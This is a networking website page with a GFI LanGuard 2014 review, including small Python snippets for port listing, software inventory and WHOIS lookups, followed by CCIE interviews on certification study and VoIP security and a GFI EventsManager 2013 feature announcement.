Network Security GFI Languard 2014 100% ScoreFor a company’s IT department, it is essential to manage and monitor all assets with a high level of effectiveness, efficiency and transparency for users. Centralised management software becomes a crucial tool for the IT department to ensure that all assets are performing at their utmost efficiency, and that they are safeguarded from any anomalies, be it a virus attack, or security holes created by unpatched software or even the OS.

GFI LanGuard is one such software product that promises to provide a consolidated platform from which software, network and security management can be performed, remotely, on all assets under its umbrella. A review of LanGuard Version 2011 was published previously on Firewall.cx by our esteemed colleagues Alan Drury and John Watters. Here are our observations on the latest version, LanGuard 2014. This is something we would call a perspective from a fresh pair of eyes.

Installation

The installation phase has been made seamless by GFI. There are no major changes from the previous version. Worth noting is that near the end of the installation you will be asked to point towards an existing instance of SQL Server, or install one. This might prolong the entire process but, overall, it is a very tidy installation package. Our personal opinion is to ensure the hardware server has a decent amount of memory and CPU speed to handle the sheer number-crunching needs of LanGuard.

First Look: The Dashboard

Once the installation is complete, LanGuard is ready to roll without the need for any OS restarts or a hardware reboot. For the purpose of this review two computers, one running Windows 7 and the other running Linux Ubuntu, were used. The Dashboard is the first main screen the user will encounter:

review-languard-2014-1Main Screen (Click to enlarge)

LanGuard will be able to pick up the machines it needs to monitor from the workgroup it belongs to. Obviously it does show a lot of information at one glance. The section of Common Tasks (lower left corner) is very useful for performing repetitive actions like triggering scans, or even adding computers. Adding computers can be done by looking into the existing domain, by computer name, or even by its IP address. Once LanGuard identifies the computer, and knows more about it from scan results, it allocates the correct workgroup under the Entire Network section.

Below is what the Dashboard looked like for a single device or machine:

review-languard-2014-2(Click to enlarge)

The Dashboard has several sub categories, but we’ll talk about them once we finish discussing the Scan option.

Scan Option

The purpose of this option is to perform the management scan of the assets that need to be monitored via LanGuard. Once the asset is selected LanGuard will perform various types of scans, called audit operations. Each audit operation corresponds to an output of information under several sections for that device. Information ranges from hardware type, software installed, ports being used, patch information etc.

The following screenshot displays a scan in progress on such a device:

review-languard-2014-3LanGuard Scan Option (Click to enlarge)

The progress of the Scan is shown at the top. The bottom section, with multiple tabs, lets the user know the various types of audit operations that are being handled. If any errors occur they appear in the Errors tab. This is very useful in terms of finding out if there are any latent issues with any device that might hamper LanGuard’s functions.

The Dashboard – Computers Tab

Once the Scan is complete, the Dashboard becomes more useful in terms of finding information about the devices. The Computers Tab is a list view of all such devices. The following screenshot shows how the various sections can be used to group and order the devices on the list:

review-languard-2014-4LanGuard Computer Tab (Click to enlarge)

Notice that just above the header named ‘Computer Information’, it asks the user to drag any column header to group the computers using that column. This is a unique feature. This goes to show that LanGuard has given the control of visibility to the user, instead of providing stock views. As well, every column header can be used to set filters. This means the user has multiple viewing options that can be adjusted depending on the need of the hour.

The Dashboard – History Tab

This tab is a listed historical view of all actions that have been taken on a given device. Every device’s functional history is shown, based on which computer has been selected on the left ‘Entire Network’ section. This is like an audit trail that can be used to track the functional progression of the computer. The following screenshot displays the historical data generated on the Windows 7 desktop that was used for our testing.

review-languard-2014-5LanGuard History Tab (Click to enlarge)

Information is sectioned in terms of date, and then further sectioned in terms of time stamps. We found the level of reporting to be very useful and easy to read.

The Dashboard – Vulnerabilities

This is perhaps one of the most important tabs under the Dashboard. At a glance you can find out the main weaknesses of the machine scanned. All vulnerabilities are subdivided into types, based on their level of criticality. If the user selects a type, the actual list of issues comes up in the right-hand panel.

If the user then selects a single vulnerability, a clearer description appears at the bottom. LanGuard not only tells you about the weakness, it also provides valid recommendations on how to deal with it. Here's a view of our test desktop's weaknesses. Thanks to LanGuard, all of them were resolved!

review-languard-2014-6LanGuard Vulnerabilities Tab (Click to enlarge)

The Dashboard – Patches

Like the Vulnerabilities tab, the Patches tab shows the user the software updates and patches that are lacking on the target machine. Below is a screenshot demonstrating this:

review-languard-2014-7LanGuard Patches Tab (Click to enlarge)

Worth noting is the list of action buttons on the panel at the bottom right corner. The user has the option of acknowledging the patch issue or setting it to 'ignore'. The 'Remediate' option is discussed later in this review.

The Dashboard – Ports Tab

The function of the Ports tab is to display which ports are open on the target machine. They are smartly divided into TCP and UDP ports. When the user selects either of the two divisions, the ports are listed in the right panel. Selecting a port displays the process which is using that port, along with the process path. From a network management point of view, with network security in mind, this is an excellent feature to have.

review-languard-2014-8LanGuard Ports Tab (Click to enlarge)
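
The idea behind this view, enumerating listening sockets and mapping each back to the process that owns it, is simple enough to sketch in a few lines of code. The following Python snippet is our own illustration using the third-party psutil library (not how LanGuard gathers the data); it lists listening TCP ports and bound UDP ports along with the owning process name and path:

```python
import socket
import psutil  # third-party: pip install psutil


def listening_ports():
    """Yield (protocol, port, process name, process path) for local sockets."""
    for conn in psutil.net_connections(kind="inet"):
        if not conn.laddr:
            continue
        # Keep listening TCP sockets and all bound UDP sockets
        if conn.type == socket.SOCK_STREAM and conn.status != psutil.CONN_LISTEN:
            continue
        proto = "TCP" if conn.type == socket.SOCK_STREAM else "UDP"
        name = path = "unknown"
        if conn.pid:
            try:
                proc = psutil.Process(conn.pid)
                name, path = proc.name(), proc.exe()
            except (psutil.NoSuchProcess, psutil.AccessDenied):
                pass
        yield proto, conn.laddr.port, name, path


if __name__ == "__main__":
    for proto, port, name, path in sorted(listening_ports()):
        print(f"{proto:3} {port:5}  {name}  ({path})")
```

Comparing successive snapshots of this kind of output against a known-good baseline is, in essence, what a port audit boils down to.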

The Dashboard – Software Tab

This tab is a good representation of how well LanGuard scans the target machine and brings out information about it. Any software installed, along with version and authorisation, is listed. An IT manager can use this information to reveal any unauthorised software that might be in use on company machines. This makes absolute sense when it comes to safeguarding company assets from the hazards of pirated software:

review-languard-2014-9LanGuard Software Tab (Click to enlarge)
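
On Windows, this kind of inventory can be approximated by reading the registry uninstall keys. The sketch below is purely illustrative (Python, standard-library winreg, Windows-only) and says nothing about how LanGuard builds its inventory; the APPROVED allowlist is hypothetical:

```python
import winreg  # Windows-only standard library

UNINSTALL_KEYS = [
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    r"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall",
]

# Hypothetical allowlist of approved software titles
APPROVED = {"7-Zip", "Mozilla Firefox", "Microsoft Office"}


def installed_software():
    """Yield (name, version) pairs read from the registry uninstall keys."""
    for key_path in UNINSTALL_KEYS:
        try:
            root = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path)
        except OSError:
            continue
        for i in range(winreg.QueryInfoKey(root)[0]):
            try:
                sub = winreg.OpenKey(root, winreg.EnumKey(root, i))
                name, _ = winreg.QueryValueEx(sub, "DisplayName")
                try:
                    version, _ = winreg.QueryValueEx(sub, "DisplayVersion")
                except OSError:
                    version = "n/a"
                yield name, version
            except OSError:
                continue


if __name__ == "__main__":
    for name, version in sorted(installed_software()):
        flag = "" if any(name.startswith(a) for a in APPROVED) else "  <-- not on allowlist"
        print(f"{name} {version}{flag}")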

The Dashboard – Hardware Tab

The main purpose of the Hardware tab is exactly what its name suggests: displaying the hardware components of the machines. The information provided is very detailed and can be very useful in maintaining a framework of similar hardware across the IT infrastructure. LanGuard is very good at obtaining detailed information about a machine and presenting it in a very orderly fashion. Here's what LanGuard presented in terms of hardware information:

review-languard-2014-10LanGuard Hardware Tab (Click to enlarge)

The Dashboard – System Information

This tab shows all the processes and services running on the machine, together with user-specific information and shares. It lists the various user profiles and the users currently logged on, so it can be used to confirm whether a given user exists on a machine, to review the shares that are listed, and to identify users and shares as authorised or not. As always, selecting an item in the System Information list on the right-hand panel displays more details on the bottom panel.

review-languard-2014-11LanGuard System Information Tab (Click to enlarge)

Remediate Option

One of LanGuard's key options, Remediate, is there to ensure that all important patches and upgrades necessary for your machines are delivered as and when required. As mentioned earlier in the Dashboard – Patches section, any upgrade or patch that is missing is listed with a Remediate option. Remediate not only lets the user deploy patches, it also helps in delivering bespoke software and malware protection. This is a vital function as it ensures the security and integrity of the IT infrastructure. A quick look at the main screen for Remediate clearly defines its utilities:

review-languard-2014-12LanGuard Remediate Main Screen (Click to enlarge)

The level of detail provided and the ease of operation were clearly evident.

Here’s a snapshot of the Software Updates screen. The layout speaks for itself:

review-languard-2014-13LanGuard Deploy Software Updates Screen (Click to enlarge)

Obviously, the user is allowed to pick and choose which updates to deploy and which ones to shelve for the time being.

Activity Monitor Option

This is more of an audit trail of all the actions, whether manually triggered or scheduled, that have been taken by LanGuard. This helps the user to find out if any scan or search has encountered any issues. This gives a bird’s eye view of how well LanGuard is working in the background to ensure the assets are being monitored properly.

The top left panel helps the user to select which audit trail needs to be seen and, based on that, the view dynamically changes to accommodate the relevant information. Here’s what it would look like if one wanted to see the trail of Security Scans:

review-languard-2014-14LanGuard Activity Monitor Option (Click to enlarge)

Reports Option

All the aforementioned information is only worth gathering if it can be presented in a way that supports commercial and technical decisions. That is where LanGuard presents us with a plethora of reporting options. The sheer volume of options was a bit overwhelming, but every report has its own merits. The screenshot below does not even show the bottom of the reports menu; there's a lot more to scroll through:

review-languard-2014-15LanGuard Reports Option (Click to enlarge)

Running the Network Security Report produced a presentation that covered every detail without overwhelming the reader with too much information. Here's what it looked like:

review-languard-2014-16LanGuard Network Security Report (Click to enlarge)

The graphical report was certainly eye catching.

Configuration Option

Clearly LanGuard has not shied away from giving users the power to tweak the software to their best advantage. Users can scan the network for devices and remotely deploy the agents which perform the repeated scheduled scans.

review-languard-2014-17LanGuard Configuration Option (Click to enlarge)

LanGuard was unable to scan the Ubuntu box properly and refused to deploy the agent, in spite of being given the right credentials.

A check on GFI's website for the minimum supported Linux version showed that our Ubuntu installation was two versions above the requirement. The scan could only recognise it as 'Probably Unix', and that's the most LanGuard managed. We suspect the problem is related to the system's firewall and security settings.

The following message appeared on the Agent Dialog box when trying to deploy it on the Linux machine: “Not Supported for this Operating System”

review-languard-2014-18Minor issues identifying our Linux workstation (Click to enlarge)

Moving on to LanGuard's latest offering: the ability to manage mobile devices. This is a new addition to LanGuard's arsenal. It can manage and monitor mobile devices that use a Microsoft Exchange Server for email access, so company smartphones and tablets can be managed using this new tool. Here's the interface:

review-languard-2014-19LanGuard Managing Mobile Devices (Click to enlarge)

Utilities Option

We call it the Swiss Army knife for network management. One of our favourite sections, it includes quick and easy ways of checking the network features of any device or IP address. This just goes to prove that LanGuard is a very well thought-out piece of software. Not only does it include mission-critical functions, it also provides a day-to-day point of mission control for the IT manager.

We could not stop ourselves from performing a quick check on the output from the Whois option here:

review-languard-2014-21LanGuard Whois using Utilities (Click to enlarge)
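
WHOIS itself is a very simple protocol (RFC 3912): send the query followed by CRLF to a server on TCP port 43 and read the reply until the connection closes. The short Python sketch below illustrates what such a utility does under the hood; it is our own example and says nothing about how LanGuard implements it:

```python
import socket


def whois(query, server="whois.iana.org", port=43):
    """Send a WHOIS query (RFC 3912) and return the server's reply as text."""
    with socket.create_connection((server, port), timeout=10) as sock:
        sock.sendall((query + "\r\n").encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:          # server closes the connection when done
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


if __name__ == "__main__":
    # IANA's server replies with a referral to the authoritative registry
    print(whois("firewall.cx"))
```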

The other options were pretty self-explanatory and of course very handy for a network manager.

Final Verdict

LanGuard provides an impressive set of tools. The process of adding machines, gathering information and then displaying that information is very efficient. The reporting is extremely resourceful and caters to practically every need an IT Manager might have. We hope the lack of support for Linux is an isolated incident. It has grabbed the attention of this reviewer to the point that he is willing to engage his own IT Manager and ask what software his IT Department uses.

If it’s not LanGuard, there’s enough evidence here to put a case for this brilliant piece of software. LanGuard is a very good tool and should be part of an IT Manager’s or Administrator’s arsenal when it comes to managing a small to large enterprise IT Infrastructure.

 

 

 

  • Hits: 26804

Interview: Kevin Wallace CCIEx2 #7945 (Routing/Switching and Voice) & CCSI (Instructor) #20061

ccie-kevin-wallaceKevin Wallace is a well-known name in the Cisco industry. Most Cisco engineers and Cisco certification candidates know Kevin from his Cisco Press titles and the popular Video Mentor training series.  Today, Firewall.cx has the pleasure of interviewing Kevin and revealing how he managed to become one of the world's most popular CCIEs, which certification roadmap Cisco candidates should choose, which training method is best for your certification and much more.

Kevin Wallace, CCIEx2 (R/S and Voice) #7945, is a Certified Cisco Systems Instructor (CCSI #20061), and he holds multiple Cisco certifications, including CCNP Voice, CCSP, CCNP, and CCDP, in addition to multiple security and voice specializations. With Cisco experience dating back to 1989 (beginning with a Cisco AGS+ running Cisco IOS 7.x), Kevin has been a network design specialist for the Walt Disney World Resort, a senior technical instructor for SkillSoft/Thomson NETg/KnowledgeNet, and a network manager for Eastern Kentucky University. Kevin holds a Bachelor of Science degree in Electrical Engineering from the University of Kentucky. He lives in central Kentucky with his wife (Vivian) and two daughters (Stacie and Sabrina).

Firewall.cx Interview Questions

Q1. Hello Kevin and thanks for accepting Firewall.cx’s invitation. Can you tell us a bit about yourself, your career and daily routine as a CCIE (Voice) and Certified Cisco Systems Instructor (CCSI)?

Sure. As I was growing up, my father was the central office supervisor at the local GTE (General Telephone) office. So, I grew up in and around a telephone office. In college, I got a degree in Electrical Engineering, focusing on digital communications systems. Right out of college, I went to work for GTE Laboratories where I did testing of all kinds of telephony gear, everything from POTS (Plain Old Telephone Service) phones to payphones, key systems, PBX systems, and central office transmission equipment.

Then I went to work for a local university, thinking that I was going to be their PBX administrator but, to my surprise, they wanted me to build a data network from scratch, designed around a Cisco router. This was about 1989 and the router was a Cisco AGS+ router running Cisco IOS 7.x. And I just fell in love with it. I started doing more and more with Cisco routers and, later, Cisco Catalyst switches.

Also, if you know anything about my family and me you know we’re huge Disney fans and we actually moved from Kentucky to Florida where I was one of five Network Design Specialists for Walt Disney World. They had over 500 Cisco routers (if you count RSMs in Cat 5500s) and thousands of Cisco Catalyst switches. Working in the Magic Kingdom was an amazing experience.

However, due to a family health issue we had to move back to KY where I started teaching classes online for KnowledgeNet (a Cisco Learning Partner). This was in late 2000 and, even though we’ve been through a couple of acquisitions (first Thomson NETg and then Skillsoft), we’re still delivering Cisco authorized training live and online.

Being a Cisco trainer has been a dream job for me because it lets me stay immersed in Cisco technologies all the time. Of course I need, and want, to keep learning. I’m always in pursuit of some new certification. Just last year I earned my second CCIE, in Voice. My first CCIE, in Route/Switch, came way back in 2001.

In addition to teaching live online Cisco courses (mainly focused on voice technologies), I also write books and make videos for Cisco Press and have been for about the last ten years.

So, to answer your question about my daily routine: it’s a juggling act of course delivery and course development projects for Skillsoft and whatever book or video title I’m working on for Cisco Press.

Q2. We would like to hear your personal opinion on Firewall.cx’s technical articles covering Cisco technologies, VPN Security and CallManager Technologies. Would you recommend Firewall.cx to Cisco engineers and certification candidates around the world?

Firewall.cx has an amazing collection of free content. Much of the reference material is among the best I’ve ever seen. As just one example, the Protocol Map Cheat Sheet in the Downloads area is jaw-dropping. So, I would unhesitatingly recommend Firewall.cx to other Cisco professionals.

Q3. As a Cisco CCIE (Voice) and Certified Cisco Systems Instructor (CCSI) with more than 14 years experience, what preparation techniques do you usually recommend to students/engineers who are studying for Cisco certifications?

For me, it all starts with goal setting. What are you trying to achieve and why? If you don’t have a burning desire to achieve a particular certification, it’s too easy to run out of gas along your way.

You should also have a clear plan for how you intend to achieve your goal. “Mind mapping” is a tool that I find really useful for creating a plan. It might, for example, start with a goal to earn your CCNA. That main goal could then be broken down into subgoals such as purchasing a CCNA book from Cisco Press, building a home lab, joining an online study group, etc. Each of those subgoals could then be broken down even further.

Also, since I work for a Cisco Learning Partner (CLP), I’m convinced that attending a live training event is incredibly valuable in certification preparation. However, if a candidate’s budget doesn’t permit that I recommend using Cisco Press books and resources on Cisco’s website to self-study. You’ve also got to “get your hands dirty” working on the gear. So, I’m a big fan of constructing a home lab.

When I was preparing for each of my CCIE certifications, I dipped into the family emergency fund in order to purchase the gear I needed to practice on. I was then able to sell the equipment, nearly at the original purchase price, when I finished my CCIE study.

But rather than me rattling on about you should do this and that, let me recommend a super inexpensive book to your readers. It’s a book I wrote on being a success in your Cisco career. It’s called, “Your Route to Cisco Career Success,” and it’s available as a Kindle download (for $2.99) from Amazon.com.

If anyone reading this doesn’t have a Kindle reader or app, the book is also available as a free .PDF from the Products page of my website, 1ExamAMonth.com/products.

Q4. In today’s fast paced technological era, which Cisco certifications do you believe can provide a candidate with the best job opportunities?

I often recommend that certification candidates do a search on a job website, such as dice.com or monster.com, for various Cisco certs to see what certifications are in demand in their geographical area.

However, since Cisco offers certifications in so many different areas, certification candidates can pick an area of focus that’s interesting to them. So, I wouldn’t want someone to pursue a certification path just because they thought there might be more job opportunities in that track if they didn’t have an interest and curiosity about that field.

Before picking a specific specialization, I do recommend that everyone demonstrate that they know routing and switching. So, my advice is to first get your CCNA in Routing and Switching and then get your CCNP. At that point, decide if you want to specialize in a specific technology area such as security or voice, or if you want to go even deeper in the Routing and Switching arena and get your CCIE R/S.

Q5. There is a steady rise on Cisco Voice certifications and especially the CCVP certification. What resources would you recommend to readers who are pursuing their CCVP certification that will help them prepare for their exams?

Interestingly, Cisco has changed the name of the CCVP certification to the CCNP Voice certification, and it’s made up of five exams: CVOICE, CIPT1, CIPT2, TVOICE and CAPPS. Since I teach all of these classes live and online, I think that’s the best preparation strategy. However, it is possible to self-study for those exams. Cisco Press offers comprehensive study guides for the CVOICE, CIPT1 and CIPT2 exams. However, you’ll need to rely on the exam blueprints for the TVOICE and CAPPS exams, where you take each blueprint topic and find a resource (maybe a book, maybe a video, or maybe a document on Cisco’s website) to help you learn that topic.

For hands-on experience, having a home lab is great. However, you could rent rack time from one of the CCIE Voice training providers or purchase a product like my CCNP Voice Video Lab Bundle, which includes over 70 videos of lab walkthroughs for $117.

Q6. What is your opinion on Video based certification training as opposed to text books – Self Study Guides?

Personally I use, and create, both types of study materials. Books are great for getting deep into the theory and for being a real-world reference. However, for me, there's nothing like seeing something actually configured from start to finish and observing the results. When I was preparing for my CCIE Voice lab I would read about a configuration, but many times I didn't fully understand it until I saw it performed in a training video.

So, to answer your question: instead of recommending one or the other, I recommend both.

We thank Kevin Wallace for his time and interview with Firewall.cx.

 

 

  • Hits: 24084

Interview: Vivek Tiwari CCIEx2 #18616 (CCIE Routing and Switching and Service Provider)

CCIE Interview - Vivek Tiwari CCIE #18616  (CCIE Routing and Switching and Service Provider)Vivek Tiwari holds a Bachelor’s degree in Physics, MBA and many certifications from multiple vendors including Cisco’s CCIE.  With a double CCIE on R&S and SP track under his belt he mentors and coaches other engineers. 

Vivek has been working in the Inter-networking industry for more than fifteen years, consulting for many Fortune 100 organizations. These include service providers, as well as multinational conglomerate corporations and the public sector. His five plus years of service with Cisco’s Advanced Services has gained him the respect and admiration of colleagues and customers alike.

His experience includes, but is not limited to, network architecture, training, operations, management and customer relations, which made him a sought after coach and mentor, as well as a recognized leader. 

He is also the author of the following titles:

 “Your CCIE Lab Success Strategy the non-Technical guidebook”

“Stratégie pour réussir votre Laboratoire de CCIE”

“Your CCNA Success Strategy Learning by Immersing – Sink or Swim”

“Your CCNA Success Strategy the non-technical guidebook for Routing and Switching”

Q1.  Hello Vivek and thanks for accepting Firewall.cx’s invitation for this interview.   Can you let us know a bit more about your double CCIE area of expertise and how difficult the journey to achieve it was?

I have my CCIE in Routing and Switching and Service Provider technologies. The first CCIE journey was absolutely difficult. I was extremely disappointed when I failed my lab the first time. This is the only exam in my life that I had not passed the first time. However, that failure made me realize that CCIE is difficult but within my reach. I realized the mistakes I was making, persevered and eventually passed Routing and Switching CCIE in about a year’s time.

After the first CCIE I promised myself never to go through this again but my co-author Dean Bahizad convinced me to try a second CCIE and surprisingly it was much easier this time and I passed my Service Provider lab in less than a year’s time.

We have chronicled our story and documented the huge number of lessons learned in our book Your CCIE Lab Success Strategy the non-technical guidebook. This book has been reviewed by your website and, I am proud to say, has been helping engineers all over the globe.

Q2. As a globally recognised and respected Cisco professional, what do you believe is the true value of Firewall.cx toward its readers?

Firewall.cx is a gem for its readers globally. Every article that I have read to date on Firewall.cx is well thought out and contains great, detailed information. The accompanying diagrams are fantastic. The articles get your attention and are well written; I have always read the full article and have never left one halfway.

The reviews for books are also very objective and give you a feel for it. Overall this is a great service to the network engineer community.

Thanks for making this happen.

Q3. Could you describe your daily routine as a Cisco double CCIE?

My daily routine as a CCIE depends on the consulting role that I am playing at that time. I will describe a few of them:

Operations: being in operations you will always be on the lookout for what outages happened in the last 24 hours or in the last week. Find the detailed root cause for it and suggest improvements. These could range from a change in design of the network to putting in new processes or more training at the appropriate levels.

Architecture: As an architect you are always looking into the future and trying to interpret the current and future requirements of your customer. Then you have to extrapolate these to make the network future proof for at least 5 to 7 years. Once that is done then you have to start working with network performance expected within the budget and see what part of the network needs enhancement and what needs to be cut.

This involves lots of meetings and whiteboard sessions.

Mix of the Above: After the network is designed you have to be involved at a pilot site where you make your design work with selected operations engineers to implement the new network. This ensures knowledge transfer and also proves that the design that looked good on the board is also working as promised.

All of the above does need documentation so working with Visio, writing white papers, implementation procedures and training documents are also a part of the job. Many engineers don’t like this but it is essential.

Q4. There are thousands of engineers out there working on their CCNA, CCNP and CCVP certifications.  Which certification do you believe presents the biggest challenge to its candidates?

All certifications have their own challenges. This challenge varies from one individual to another. However, in my mind CCNA is extremely challenging if it is done the proper way. I say this because most of the candidates doing CCNA are new to networking and they have not only to learn new concepts of IP addressing and routing but also have to learn the language of typing all those commands and making it work on a Cisco Device.

The multitude of learning makes it very challenging. Candidates are often stuck in a maze running from one website to another, or studying one book and then another, without any real results. That is the reason we have provided a GPS for CCNA, our book “Your CCNA Exam Success Strategy the non-technical guidebook”.

I also want to point out that whenever we interview CCNA engineers many have the certificate but it seems they have not spent the time to learn and understand the technologies.

What they don’t understand is that if I am going to depend on them to run my network which has cost my company millions of dollars I would want a person with knowledge not just a certificate.

Q5. What resources do you recommend for CCNA, CCNP, CCVP and CCIE candidates, apart from the well-known self-study books?

Apart from all the books the other resources to have for sure are

  1. A good lab. It could be made of real network gear or a simulator, but you should be able to run scenarios on it.
  2. Hands on practice in labs.
  3. Be curious while doing labs and try different options (only on the lab network please)
  4. A positive attitude to learning and continuous improvement.
    a) Write down every week what you have done to improve your skills
    b) Don’t be afraid to ask questions.
  5. Lastly and most important have a mentor. Follow the guidelines in our book about choosing a mentor and how to take full advantage of a mentor. Remember a mentor is not there to spoon feed you: a mentor is there to make sure you are moving in the right direction and in case you are stuck to show you a way out (not to push you out of it). A mentor is a guide not a chauffeur.

Q6. When looking at the work of other Cisco engineers, e.g network designs, configurations-setup etc, what do you usually search for when trying to identify a knowledgeable and experienced Cisco engineer?

I usually do not look at a design and try to find a flaw in it. I do make a note of design discrepancies that come to my mind. I say that from experience because what you see as a flaw might be a design requirement. For example, I have seen that some companies send all the traffic coming inside from the firewall across the data center to a dedicated server farm where it is analysed and then sent across to the different parts of the company. It is very inefficient and adds delay but it is by design.

I have seen many differences in QOS policies even between different groups within the organizations.

If a network design satisfies the legal, statutory and organization requirements then it is the best design.

Q7. What advice would you give to our readers who are eager to become No.1 in their professional community? Is studying and obtaining certifications enough or is there more to it?

Studying is important but more important is to understand it and experience it. Obtaining certifications has become necessary now because that is one of the first ways that a candidate can prove to their prospective employer that they have learnt the technologies. If an employer is going to let you work on his network that will cost him thousands of dollars per minute of downtime (think eBay, amazon, PayPal, a car assembly line) or could even cost lives of people (think of a hospital network, or the emergency call network like the 911 in US, or the OnStar network in US) then they’d better be careful in hiring. I am sure you agree. Certification is what gets you in the door for an interview only but it is:

  • Your knowledge and understanding
  • Your experience
  • Your attitude towards your work
  • How well you work in teams
  • Which work related areas are of interest to you (Security, Voice, Wireless etc.) that gets you the job and makes you move ahead in your career.

The best way to move ahead and be No. 1 in your career is to do what you are passionate about. If you are pursuing your passion then it is not work anymore and you enjoy doing it and will excel beyond limits.

Another thing I would want to tell the readers is don’t chase money. Chase excellence in whatever you are doing and money will be the positive side effect of your excellence.

 

  • Hits: 33889

The New GFI EventsManager 2013 - Active Network and Server Monitoring

On 21 January 2013, GFI announced the new version of its popular GFI EventsManager, now named GFI EventsManager 2013.

For those who are unaware of the product, GFI EventsManager is one of the most popular software solutions that allows a network administrator, engineer or IT manager to actively monitor a whole IT infrastructure from a single intuitive interface.

Even though GFI EventsManager has been in continuous development, this time GFI has surprised us once again by introducing highly anticipated features that make this product a one-of-a-kind winner.

gfi-eventsmanager-2013-features-1

Below is a list of some of the new features included in GFI EventsManager 2013 that make this product a must for any company:

  • Active network and server monitoring based on monitoring checks is now available and can function in conjunction with the log based monitoring system in order to provide a complete and thorough view of the status of your environment.
  • The unique combination of active network and server monitoring through log-based network and server monitoring provides you not only with incident identification but also with a complete set of logs from the assets that failed, making problem investigation and solving much easier.
  • Enhanced console security system helps compliance with 'best practice' recommendations that require access to data on a "need-to-know" basis. Starting with this version, each GFI EventsManager user can be assigned a subset of computers that he/she manages, and the console will only allow use of the data coming from those configured computers while the user is logged in.
  • New schema for parsing XML files, available by default, that enables monitoring of XML–based logs and configuration files.
  • New schema for parsing DHCP text logs that enables monitoring of DHCP IP assignment.
  • More flexibility for storing events: the new database system has been updated to include physical deletion of events for easier maintenance and collection to remote databases.
  • Hashing of log data for protection against attempts at tampering with the logs coming from outside the product, enables enhanced log consolidation and security.
  • New reports for J-SOX and NERC CIP compliance.
  • Hits: 14857

Interview: Akhil Behl CCIEx2 #19564 (Voice & Security)

It's not every day you get the chance to interview a CCIE, and especially a double CCIE! Today, Firewall.cx interviews Akhil Behl, a double CCIE (Voice & Security) #19564 and author of the popular Cisco Press title 'Securing Cisco IP Telephony Networks'.

Akhil Behl's Biography

ccies author akhil behlAkhil Behl is a Senior Network Consultant with Cisco Advanced Services, focusing on Cisco Collaboration and Security architectures. He leads Collaboration and Security projects worldwide for Cisco Services and the Collaborative Professional Services (CPS) portfolio for the commercial segment. Prior to his current role, he spent 10 years working in various roles at Linksys, Cisco TAC, and Cisco AS. He holds CCIE (Voice and Security), PMP, ITIL, VMware VCP, and MCP certifications.

He has several research papers published to his credit in international journals including IEEE Xplore.

He is a prolific speaker and has contributed at prominent industry forums such as Interop, Enterprise Connect, Cloud Connect, Cloud Summit, Cisco SecCon, IT Expo, and Cisco Networkers.

Be sure not to miss our review of Akhil's popular Securing Cisco IP Telephony Networks and his outstanding article on Secure CallManager Express Communications - Encrypted VoIP Sessions with SRTP and TLS.

Readers can find outstanding Voice Related Technical Articles in our Cisco VoIP/CCME & CallManager Section.

Interview Questions

Q1. What are the benefits of a pure VoIP against a hybrid system?

Pure VoIP solutions are a recent addition to the overall VoIP portfolio. SIP trunks offered by service providers are helping convert the PSTN world to being reachable over IP instead of TDM. A pure VoIP system has a number of advantages over a hybrid VoIP system, for example:

  • All media and signaling is purely IP based and no digital or TDM circuits come into the picture. This in turn implies better interoperability of various components within and outside the ecosystem.
  • Configuration, troubleshooting, and monitoring of a pure VoIP solution is much more lucid as compared to a hybrid system.
  • The security construct of a pure VoIP system is something which the provider and consumer can mutually agree upon and deploy. In other words, the enterprise security policies can now go beyond the usual frontiers up to the provider’s soft-switch/SBC.

Q2. What are the key benefits/advantages and disadvantages of using Cisco VoIP Telephony System, coupled with its security features?

Cisco's IP Telephony / Unified Communications systems present a world-class VoIP solution to consumers from small and medium businesses to large enterprises, across business verticals such as education, finance, banking, the energy sector, and government agencies. When the discussion is around the security aspect of the Cisco IP Telephony / UC solution, the advantages outweigh the disadvantages because of a multitude of factors:

  • Cisco IP Telephony endpoints, and underlying network gear is capable of providing robust security by means of built in security features
  • Cisco IP Telephony portfolio leverages industry standard cryptography and is compatible with any product based on RFC standards
  • Cisco engineering leaves no stone unturned to ensure that the IP Telephony products and applications deliver feature rich consumer experience; while maintaining a formidable security posture
  • Cisco Advanced Services helps consumers design, deploy, operate, and maintain a secure, stable, and robust Cisco IP Telephony network
  • Cisco IP Telephony and network applications / devices / servers can be configured on-demand to enable security to restrain a range of threats

Q3. As an author, please comment on the statement that your book can be used both as a reference and as a guide for security of Cisco IP Telephony implementation.

Over the past 10 years, I have seen people struggling with the lack of a complete text which can act as a reference, a guide, and a companion to help resolve UC security queries pertinent to the design, deployment, operation, and maintenance of a Cisco UC network. I felt there was a lack of complete literature which could help one through the various stages of Cisco UC solution development and build, i.e. Plan, Prepare, Design, Implement, Operate, and Optimize (PPDIOO), and thought of putting together all my experience and knowledge in the form of a book where the two realms, Unified Communications and Security, converge. More often than not, people from one realm are not acquainted with the intricacies of the other. This book serves to fill the otherwise prominent void between the UC and Security realms and acts as a guide and reference text for professionals, engineers, managers, stakeholders, and executives.

Q4. What are today’s biggest security threats when dealing with Cisco Unified Communication installations?

While there are a host of threats out there which lurk around your Cisco UC solution, the most prominent ones are as follows:

  • Toll-Fraud
  • Eavesdropping
  • Session/Call hijacking
  • Impersonation or identity-theft
  • DOS and DDOS attacks
  • Poor or absent security guidelines or policy
  • Lack of training or education at user level on their responsibility towards corporate assets such as UC services

As you can see, not every threat is a technical threat; there are threats pertinent to human as well as organizational factors. More often than not, the focus is only on technical threats, while organizations and decision makers should pay attention to other (non-technical) factors as well, without which a well-rounded security construct is difficult to achieve.

Q5. When implementing SIP Trunks on CUCM/CUBE or CUCME, what steps should be taken to ensure Toll-Fraud is prevented?

An interesting question, since toll-fraud is a chronic issue. With the advent of SIP trunks for PSTN access, the threat surface has evolved and a host of new threats come into the picture. While most of these threats can be mitigated at the call-control and Session Border Controller (CUBE) level, an improper configuration of call restriction and privilege, as well as a poorly implemented security construct, can eventually lead to toll-fraud. To prevent toll-fraud on SIP trunks the following suggestions can be helpful:

  • Ensure that users are assigned the right calling search space (CSS) and partitions (in case of CUCM) or Class of Restriction (COR in case of CUCME)  at line/device level to have a granular control of who can dial what
  • Implement after-hour restrictions on CUCM and CUCME
  • Disable PSTN or out-dial from Cisco Unity, Unity Connection, and CUE or at least restrict it to a desirable local/national destination(s) as per organization’s policies
  • Implement strong pin/password policies to ensure user accounts cannot be compromised by brute force or dictionary based attacks
